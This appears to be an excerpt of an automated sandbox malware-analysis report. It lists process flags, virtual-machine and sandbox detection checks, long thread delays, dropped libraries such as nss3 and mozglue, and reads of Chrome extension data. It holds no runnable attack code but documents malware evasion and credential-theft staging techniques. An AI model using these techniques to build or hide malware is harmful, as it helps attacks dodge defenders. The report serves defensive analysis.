Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Drivers\csrss.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Drivers\csrss.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Drivers\csrss.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Drivers\csrss.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\D0F8.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\D0F8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-G4HEA.tmp\D0F8.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-G4HEA.tmp\D0F8.tmp	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-G4HEA.tmp\D0F8.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-G4HEA.tmp\D0F8.tmp	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-G4HEA.tmp\D0F8.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-G4HEA.tmp\D0F8.tmp	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-G4HEA.tmp\D0F8.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-G4HEA.tmp\D0F8.tmp	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\E4FE.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\E4FE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-3OOS1.tmp\E4FE.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-3OOS1.tmp\E4FE.tmp	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-3OOS1.tmp\E4FE.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-3OOS1.tmp\E4FE.tmp	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-3OOS1.tmp\E4FE.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-3OOS1.tmp\E4FE.tmp	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-3OOS1.tmp\E4FE.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-3OOS1.tmp\E4FE.tmp	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\D0F8.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\MCYq2AqNU0.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\MCYq2AqNU0.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\MCYq2AqNU0.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\MCYq2AqNU0.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\MCYq2AqNU0.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\MCYq2AqNU0.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ccjteug	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ccjteug	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ccjteug	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ccjteug	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ccjteug	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ccjteug	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C53F.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\C53F.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\C53F.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\C53F.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\C53F.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\C53F.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\98EC.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	System information queried: FirmwareTableInformation

Tries to detect sandboxes / dynamic malware analysis system (file name check)

Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\TEsTapp.ExE			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: \KnownDlls32\TEsTapp.ExE			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: MCYq2AqNU0.exe, 00000000.00000002.2139836851.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOK
Source: ccjteug, 00000006.00000002.2456373744.000000000086E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOK4

Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Memory allocated: 1D10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Memory allocated: 3700000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Memory allocated: 1D10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Memory allocated: 3610000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Memory allocated: 3820000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Memory allocated: 3650000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Memory allocated: 6890000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Memory allocated: 5E90000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\9E0E.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 414	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1450	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 791	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1106	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 632	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 628	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Window / User API: threadDelayed 6625	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 800
Source: C:\ProgramData\Drivers\csrss.exe	Window / User API: threadDelayed 9272

Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\CD-ROM Emulator\libiconv-2.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\CD-ROM Emulator\is-35RU5.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-OLN1J.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-OLN1J.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\CD-ROM Emulator\zlib1.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\CD-ROM Emulator\is-KKEVI.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\CD-ROM Emulator\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\CD-ROM Emulator\libgcc_s_dw2-1.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\CD-ROM Emulator\libwinpthread-1.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\CD-ROM Emulator\libogg-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\CD-ROM Emulator\libvorbisenc-2.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-OLN1J.tmp\_isetup\_iscrypt.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\CD-ROM Emulator\is-M5JQ4.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\CD-ROM Emulator\libvorbis-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\CD-ROM Emulator\is-CJI63.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\CD-ROM Emulator\avutil-56.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\CD-ROM Emulator\is-836TM.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\CD-ROM Emulator\is-PC6U4.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsvCB06.tmp\INetC.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\CD-ROM Emulator\is-NARCG.tmp	Jump to dropped file
Source: C:\Windows\explorer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7DFF.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\CD-ROM Emulator\is-KCHS2.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-OLN1J.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\CD-ROM Emulator\swresample-3.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\CD-ROM Emulator\is-KL11C.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\CD-ROM Emulator\SDL2.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\CD-ROM Emulator\is-VSFOK.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\CD-ROM Emulator\is-VAQO3.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\CD-ROM Emulator\is-5E5MG.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\CD-ROM Emulator\is-UD4UM.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\CD-ROM Emulator\libbz2-1.dll (copy)	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\81F7.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

graph_9-8606

Source: C:\Windows\explorer.exe TID: 2996	Thread sleep time: -145000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 948	Thread sleep time: -79100s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2996	Thread sleep time: -110600s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe TID: 3236	Thread sleep count: 6625 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe TID: 3236	Thread sleep time: -662500s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe TID: 3784	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe TID: 1976	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\98EC.exe TID: 6788	Thread sleep time: -210000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1340	Thread sleep time: -210000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\9E0E.exe TID: 3664	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\AF26.exe TID: 3748	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3568	Thread sleep count: 800 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5960	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3492	Thread sleep count: 104 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3516	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\Drivers\csrss.exe TID: 6424	Thread sleep count: 9272 > 30
Source: C:\ProgramData\Drivers\csrss.exe TID: 6424	Thread sleep time: -927200s >= -30000s
Source: C:\ProgramData\Drivers\csrss.exe TID: 6424	Thread sleep count: 102 > 30

Source: C:\Users\user\AppData\Local\Temp\9E0E.exe

File opened: PHYSICALDRIVE0

Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor

Source: C:\ProgramData\Drivers\csrss.exe	Last function: Thread delayed
Source: C:\ProgramData\Drivers\csrss.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\9E0E.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\

Source: explorer.exe, 00000002.00000000.2127636524.000000000962B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWystem32\DriverStore\en-US\msmouse.inf_locv
Source: explorer.exe, 00000002.00000000.2128030306.00000000097F3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: 81F7.exe, 0000000A.00000003.4072645054.00000000033E1000.00000004.00000020.00020000.00000000.sdmp, 81F7.exe, 0000000A.00000003.4107736574.00000000049CF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: jErLfvfrTVBZad1JUDpJvMsRxcnu4mWPJd4lX7wRWpQajTeC7IXsqEMUz3AtPopA
Source: explorer.exe, 00000002.00000000.2127636524.000000000973C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWws
Source: explorer.exe, 00000002.00000000.2129960149.000000000C354000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.2128030306.00000000098AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}RoamingCom
Source: 81F7.exe, 0000000A.00000003.4274078285.00000000033E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: lVMCIqxFy9ykOQ/hQ9MF9FrTtieU7y42HtokDoNf3ry+pEHAoyJrK3QFMMBxTDSi
Source: explorer.exe, 00000002.00000000.2127636524.0000000009605000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTVMWare
Source: explorer.exe, 00000002.00000000.2129960149.000000000C354000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@
Source: explorer.exe, 00000002.00000000.2129960149.000000000C354000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@]
Source: explorer.exe, 00000002.00000000.2124075703.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.2124075703.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000W
